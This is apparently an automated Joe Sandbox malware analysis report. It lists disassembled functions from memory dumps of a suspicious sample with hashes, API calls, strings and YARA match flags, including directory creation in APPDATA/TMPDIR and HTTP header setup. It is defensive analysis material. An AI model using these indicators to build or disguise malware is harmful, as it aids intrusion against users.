                                                • Instruction Fuzzy Hash: E331BFB241C305DFD3096F64E8457BAB7F8EF54710F36491FE1CA86212E6315981AB47
                                                Function 0040B690 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                                Function 04D0AA90 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: a218eebe701f303f833aa15dab785052099aaf317f2a1d17e3484f5e3946e42e
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: BC112B7720034143D614CA2DD9B87B7A796FBE532072DC37AD0924B7D4D222F545A600
                                                Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                Function 04B6B8F7 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 27f173d3a7aaa6389860c0b61e20e3162434e16f03fcf77494c6a5756b5cace0
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: E311047724806243D6588E6DD4B86B6E3B5EBE5320B2C46FAD083CB7DAD23AB1449600
                                                Function 00F6C9E3 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F6C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f6c000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: f08445bca2d5ba601d9bec55df84efa80acbd4413811c99f89961882e0a37acb
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: 9511C272340104AFD744CF95DC91FB673EAEB89720B298055ED84CB302D679EC01D7A0
                                                Function 04B60D90 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction ID: 1b11a8809910066134200acfd2ee67df4d99740cf7b1871b7d22f6237b8bbf4a
                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction Fuzzy Hash: 1801A276A016148FDF21EF25C804BAE33E5EBC6216F4549E5E90B9B281E778B9418F90
                                                Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                Function 00409B9D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                                • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                                • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                                Strings
                                                • WakeAllConditionVariable, xrefs: 00409BDD
                                                • SleepConditionVariableCS, xrefs: 00409BD1
                                                • kernel32.dll, xrefs: 00409BC0
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2565136772-3242537097
                                                • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                                • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                                Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                • _free.LIBCMT ref: 1000A03A
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000A05C
                                                • _free.LIBCMT ref: 1000A071
                                                • _free.LIBCMT ref: 1000A07C
                                                • _free.LIBCMT ref: 1000A09E
                                                • _free.LIBCMT ref: 1000A0B1
                                                • _free.LIBCMT ref: 1000A0BF
                                                • _free.LIBCMT ref: 1000A0CA
                                                • _free.LIBCMT ref: 1000A102
                                                • _free.LIBCMT ref: 1000A109
                                                • _free.LIBCMT ref: 1000A126
                                                • _free.LIBCMT ref: 1000A13E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                • String ID: APPDATA$TMPDIR
                                                • API String ID: 1838500112-4048745339
                                                • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                Strings
                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: HeadersHttpRequest$H_prolog3_
                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                • API String ID: 1254599795-787135837
                                                • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                Function 0041C38F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                                • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                                • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                                • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                                Function 0040BCBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                                • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                                • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                                Function 04D0B0BB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                Download Yara Rule
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 04D0B1DA
                                                • ___TypeMatch.LIBVCRUNTIME ref: 04D0B2E8
                                                • _UnwindNestedFrames.LIBCMT ref: 04D0B43A
                                                • CallUnexpected.LIBVCRUNTIME ref: 04D0B455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction ID: 7b6221219bb55dbb89d748f8856a00264ef97102b8050ef18d9d3324b3a3e2c7
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: 42B14671904609EFDF29DFE4C880AAEBBB5FF04314B14C15AE8116B295E770FA51CBA1
                                                Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                Function 04B6BF22 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 04B6C041
                                                • ___TypeMatch.LIBVCRUNTIME ref: 04B6C14F
                                                • _UnwindNestedFrames.LIBCMT ref: 04B6C2A1
                                                • CallUnexpected.LIBVCRUNTIME ref: 04B6C2BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction ID: 1509df7a94b0188fe7ae1ffb6bd3d2e8c151811ca06297b31db7e092e5720e3b
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: 3EB18A71800219EFDF15DFA4D8809AEBBB5FF04314F1440AAE896AB215D739FA61CF91
                                                Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 3409252457-0
                                                • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                Function 04B69E04 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04B69DE2), ref: 04B69E10
                                                • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04B69DE2), ref: 04B69E1B
                                                • GetModuleHandleW.KERNEL32(0042000C,?,?,04B69DE2), ref: 04B69E2C
                                                • GetProcAddress.KERNEL32(00000000,00420028), ref: 04B69E3E
                                                • GetProcAddress.KERNEL32(00000000,00420044), ref: 04B69E4C
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B69DE2), ref: 04B69E6F
                                                • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04B69E8B
                                                • CloseHandle.KERNEL32(0042D060,?,?,04B69DE2), ref: 04B69E9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID:
                                                • API String ID: 2565136772-0
                                                • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction ID: 237c778da28d3ec3227189ffe2c952334d6fd0e3b115370afc663a24bdc1500b
                                                • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction Fuzzy Hash: 5C017571F40711ABD7205BB4FC09F973AE8EB49B05B504475F906E2161DB78D80BCA68
                                                Function 00413DCC Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                                • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                                • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                                • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                                Function 04D131CC Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction ID: 417bccfef4060ed6a3966fa8bbcf6eb7b6f96e728a362a52769359c78c714c5c
                                                • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction Fuzzy Hash: 74B14772A00295BFFB12CFA8EC81BAE7BA5FF55310F144165ED04AB2A1D674F901C7A0
